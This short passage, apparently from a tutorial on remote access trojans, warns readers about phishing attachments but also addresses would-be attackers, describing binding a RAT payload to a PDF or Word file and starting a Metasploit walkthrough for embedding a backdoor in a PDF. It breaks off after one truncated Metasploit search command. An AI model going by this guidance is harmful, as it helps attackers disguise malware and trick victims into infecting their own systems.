You can bind a PDF file or MS Word document with your payload to socially-engineer users to click on your RAT. Therefore, you should never click on any random file from your e-mail unless you can confirm it is from a trusted source. Some phishing tactics to look out for are e-mails that include files that you need to download and run. They can be fake employers, pretending to offer you a job with a PDF of the schedule or an attached contract. Be cautious of these phishing scams as they are one of the most effective ways for an attacker to get into your system.
Ways to disguise your RAT though Metasploit
PDF-embedded RAT
The following command-lines will show how to embed a backdoor connection in an innocent-looking PDF:
msf > search type:exploit platform:windows...